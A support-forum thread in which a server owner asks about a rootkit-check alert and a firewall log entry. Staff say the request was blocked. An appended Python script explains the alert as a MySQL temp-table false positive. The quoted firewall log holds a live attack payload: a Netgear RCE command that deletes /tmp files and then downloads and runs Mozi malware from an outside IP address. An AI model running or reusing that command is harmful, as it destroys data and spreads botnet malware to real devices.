Should I be concerned about these log entries?

  • christopher.scott
    Junior Member
    • Mar 2021
    • 9

    #1

    Should I be concerned about these log entries?

    - Anomaly detected in file /tmp/#sql_80d_2.MAD. Hidden from stats, but showing up on readdir. Possible kernel level rootkit.

    There were a number of these log entries around the same time:

    - IM360 WAF: Netgear unauthenticated RCE||T:APACHE||MVN:ARGS:cmd||MV:rm -rf /tmp/*;wget http://202.88.219.141:50021/Mozi.m -O /tmp/netgear;sh netgear||

    I don’t see #sql_80d_2.MAD in /tmp

    It looks kind of nasty.

    Any insight would be appreciated.

    Thx
    G
  • skhristich
    Senior Member
    • Nov 2019
    • 595

    #2
    Hello Glenn,
    Thank you for reaching out! These log entries mean that malware requests come to your server in a random order, and the Imunify360 firewall blocks these requests. It does not mean that your server has been compromised.
    You can also create a ticket https://cloudlinux.zendesk.com/hc/en-us/requests/new to check the infection of the server, and our malware analysts will be able to check for sure.
    If you have any other questions, feel free to ask here. Thank you for contacting us.


    • glenn
      Member
      • Jun 2017
      • 38

      #3
      Thanks, Sergey, for your reply. My tech confirmed as well that it's nothing to worry about.
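Why the rootcheck line in the first post ("Hidden from stats, but showing up on readdir") can fire on a file that is later nowhere to be found, as an added example that is not from the thread or from Imunify360: the check lists a directory and then stat()s every name, so anything unlinked between the two calls is reported. MySQL/MariaDB internal temporary tables are named `#sql_<pid in hex>_<n>` with Aria `.MAD`/`.MAI` files (an assumption from the naming scheme, not something the thread confirms), and they live exactly as long as the query that created them. The `between` hook below stands in for the server dropping the table on a live host.

```python
import os
import re
import tempfile
from typing import Callable, Dict, List, Optional

# Assumed naming scheme for MySQL/MariaDB internal temp tables: "#sql_<pid hex>_<n>"
# plus the storage-engine suffix (Aria .MAD/.MAI, MyISAM .MYD/.MYI).
TEMP_TABLE_RE = re.compile(r"^#sql_[0-9a-f]+_\d+\.(MAD|MAI|MYD|MYI|frm|ibd)$")


def is_mysql_temp_table(name: str) -> bool:
    return TEMP_TABLE_RE.match(name) is not None


def readdir_vs_stat(directory: str,
                    between: Optional[Callable[[], None]] = None) -> Dict[str, List[str]]:
    """The check behind the rootcheck message: list the directory (readdir),
    then stat each name. `between` is a test hook run after the listing and
    before the stats; on a real host that gap is filled by concurrent activity."""
    listed = os.listdir(directory)
    if between is not None:
        between()
    hidden = []
    for name in listed:
        try:
            os.lstat(os.path.join(directory, name))
        except FileNotFoundError:
            hidden.append(name)                   # listed a moment ago, gone now
    return {"listed": sorted(listed), "hidden_from_stat": sorted(hidden)}


def triage(directory: str, hidden: List[str]) -> Dict[str, str]:
    """Second look at each flagged name. A name that is still listed yet not
    stat-able is the genuinely odd case; a temp-table name that has vanished
    was a transient file."""
    still_there = set(os.listdir(directory))
    verdicts = {}
    for name in hidden:
        if name in still_there:
            verdicts[name] = "still listed but not stat-able: investigate"
        elif is_mysql_temp_table(name):
            verdicts[name] = "transient MySQL temp table: benign"
        else:
            verdicts[name] = "gone on re-check: likely transient, verify the creating process"
    return verdicts


def demo() -> Dict[str, object]:
    """Reproduce the post's finding in a scratch directory: the temp table file
    exists during readdir and is unlinked before stat, so it is reported once
    and is absent on the follow-up look (the "I don't see it in /tmp" step)."""
    with tempfile.TemporaryDirectory() as tmp:
        name = "#sql_80d_2.MAD"                   # file name from the post
        path = os.path.join(tmp, name)
        with open(path, "wb") as fh:
            fh.write(b"\x00" * 16)                # constructed placeholder content

        first = readdir_vs_stat(tmp, between=lambda: os.unlink(path))
        second = readdir_vs_stat(tmp)
        return {
            "first_pass": first,
            "second_pass": second,
            "verdicts": triage(tmp, first["hidden_from_stat"]),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The triage verdict is a heuristic for this specific message, not a rootkit clearance: a name that keeps showing up in readdir while stat() fails, or one that is not a temp-table pattern, still deserves a look at which process created it (lsof on the directory, or the MySQL error log around that timestamp).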
